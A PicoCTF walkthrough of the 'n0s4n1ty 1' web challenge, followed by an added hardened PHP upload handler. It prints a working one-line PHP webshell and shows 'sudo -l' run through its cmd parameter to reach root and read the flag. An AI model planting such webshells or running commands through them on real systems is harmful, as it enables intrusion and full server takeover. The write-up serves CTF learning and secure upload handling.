n0s4n1ty 1 PicoCTF Walkthrough

Furkan Sayyed

Web Exploitation

🔎 Initial Recon

The challenge gives us access to a web page that allows users to upload a profile picture. This is a classic entry point for file upload vulnerabilities. Here's what I did:

  1. Navigated to the site and saw a form titled Upload Profile Picture.

  2. Tried uploading a basic .jiff image to see what the server does with the file.

✅ Observations:

The image is now uploaded to the server. If the server accepts any file with any extension and saves it in a web-accessible folder, we might be able to upload and run a malicious script, such as a PHP webshell.


🐚 Step 1: Crafting the Web Shell

To test for Remote Code Execution (RCE), I created a simple PHP shell named shell.php with the following content:

<?php system($_GET['cmd']); ?>

📤 Step 2: Uploading the Shell

  1. Uploaded shell.php via the profile picture form.

  2. After upload, it appeared at:

  3. Let's check whether it is working or not.

    Bam! Our script is now working.

🔐 Step 3: Privilege Escalation

The next step was to check what commands the www-data user could run with sudo. I ran:

http://standard-pizzas.picoctf.net:60582/uploads/shell.php?cmd=sudo -l

The www-data user can run any command as root without providing a password. That’s a critical misconfiguration!

🧾 Step 4: Reading the Flag

  1. As given, the flag is in /root, so let's list its contents using the ls command.

    1. Here is our flag.txt; now let's read it using cat.

    2. flag

      🎉🎉 Here we got our flag.


🧠 Lessons Learned

| 🧩 Vulnerability | Description |
| --- | --- |
| Insecure File Upload | No filtering, no validation on file types or extensions. |
| Web-Accessible Upload Directory | Files stored in /uploads/ directly accessible via browser. |
| PHP Execution Enabled | .php files were executed server-side, allowing command injection. |
| Misconfigured sudo | www-data could run any command as root without a password. |

🔚 Conclusion

This challenge was a classic example of chaining two common vulnerabilities:

  1. Insecure File Upload (RCE via webshell)

  2. Privilege Escalation (via misconfigured sudo permissions)

It teaches the importance of:

  • Validating file types and extensions

  • Avoiding direct access to upload directories

  • Using minimal privileges for web server users

  • Strictly configuring sudo access
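
A hardened form of the upload handler, applying the first two lessons above. This is an added example, not code from the original walkthrough or from the challenge. The storage path, size limit, allowlist, function name and form field name are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical values: adjust to the application. The storage directory
// sits outside the document root, so nothing in it is reachable by URL.
const UPLOAD_DIR = '/var/www/private/avatars';
const MAX_BYTES  = 2 * 1024 * 1024;
// Allowlist: detected MIME type => extension assigned by the server.
const ALLOWED = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and store it; returns the stored file name.
 * Throws RuntimeException on anything that is not an allowed image.
 */
function store_avatar(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name']) || $file['size'] > MAX_BYTES) {
        throw new RuntimeException('invalid or oversized upload');
    }
    // Detect the type from the file content, never from the client-supplied
    // file name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
    if ($ext === null) {
        throw new RuntimeException('file type not allowed');
    }
    // getimagesize() returns false for data that does not parse as an image.
    if (getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a valid image');
    }
    // Server-generated name: the original name (e.g. shell.php) is discarded,
    // so the stored file never carries an executable extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// Usage in the form handler ('avatar' is an assumed field name):
// $stored = store_avatar($_FILES['avatar']);
```

Content checks alone do not stop an image that also contains PHP code. It is the server-chosen extension and the storage location outside the web root that keep such a file from being executed.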
